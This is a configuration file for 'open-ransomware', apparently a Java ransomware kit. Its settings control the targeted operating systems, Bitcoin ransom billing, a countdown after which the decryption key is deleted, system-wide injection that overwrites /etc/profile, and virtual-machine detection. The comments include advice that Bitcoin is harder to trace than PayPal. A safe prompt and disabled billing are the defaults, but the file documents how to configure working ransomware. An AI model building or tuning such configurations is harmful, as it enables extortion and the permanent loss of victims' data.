###########################################
# open-ransomware Injection Configuration #
###########################################

## Commenting any of the following configurations will go to their fallback configurations
## stored in the SoftwareEnvironment.java (in package "com.bechris100.open_ransomware") file.

# Sets the preferred Operating System for the Injection.
# macOS will receive this Ransomware, when I get a macOS VM.
# Possible values are:
# any : Any Operating System that the open-ransomware can handle (default value)
# linux : Any Linux Distribution that supports SystemD for now
# windows : Any Windows Operating System
PreferredOperatingSystem = any

# Copies this whole configuration out of the JAR/EXE/AppImage. Default value is false
ConfigCopyOut = false
ConfigCopyOutLocation.Linux = {user_home}/.config/OpenSoftware/BeChris100/open-ransomware/inject.config
ConfigCopyOutLocation.Linux.Global = /etc/OpenSoftware/BeChris100/open-ransomware/inject.config
ConfigCopyOutLocation.Windows = {user_home}\AppData\Roaming\OpenSoftware\BeChris100\open-ransomware\inject.config
ConfigCopyOutLocation.Windows.Global = {windir}\System32\OpenSoftware\BeChris100\open-ransomware\inject.config

# Prompts the User before executing the Ransomware
UserPrompt = true
UserPrompt.Title = Ransomware Prompt
# Requires to be in HTML Format to have everything in separate lines to not make it look ugly.
UserPrompt.Message = <html><body>Software can contain any harmful </body></html>

# A Ransomware cannot be a real ransomware without it's billing.
# PayPal can also be included, but the money can be traced easier than bitcoin.
PreferredBilling = bitcoin

# Set the Billing Options. Can be disabled by passing the value as 'none'.
# For PayPal, include your E-Mail Address following by this string: email '[YOUR EMAIL ADDRESS HERE]'
# For Bitcoin, include your Bitcoin Wallet following by this string: wallet '[YOUR BITCOIN WALLET HERE]'
BillingOptions = none

# Reads the file to the Display upon injecting and restarting.
# Applies the setting at User Login.
DisplayMessageFile = res/message.txt

# Enables the Timeout that most of the Ransomware Software uses.
TimeoutEnabled = true

# The Timeout that most of the Ransomware includes before taking any Timeout Actions
# To include minutes, for example, 35 minutes, add ',35m', following by seconds (',15s').
# Final output for 2 days, 20 hours, 15 minutes, 30 seconds will be '2d,20h,15m,30s'.
Timeout = 1d

# Set this to true to inject system-wide, not only the current user. Default value is false.
# On Linux, /etc/profile will be overwritten and requires sudo permission.
GlobalInjection = false

# Takes action after the timeout. Check class "actions/timeout/TimeoutAction.java:ActionType" for more
# possibilities. Split them using ',' without any spaces in between
TimeoutAction = DELETE_ENCRYPTION_KEY

# Set this to true to enable checks in case the user modified the OS Values
# These include: -Dos.name="" -Dos.arch="" -Dos.version=""
JavaVM_OperatingSystemModificationsEnabled = false

# Tell the user that modifying / altering the OS values is disabled.
# This only works if "JavaVM_OperatingSystemModifications" is set to true.
JavaVM_OSModificationDetectedMessage_OsName = The Name of your current running Operating System cannot be modified for this configuration.
JavaVM_OSModificationDetectedMessage_OsArch = The Architecture of your current running Operating System and/or Hardware cannot be modified for this configuration.
JavaVM_OSModificationDetectedMessage_OsVersion = The Version of your current running Operating System cannot be modified for this configuration.

# Check if the following Operating System is being virtualized inside of QEMU/VirtualBox/VMWare.
# You can add more File Checks inside of RansomwareClass.java:getVmCheckers()
VirtualMachineCheck = false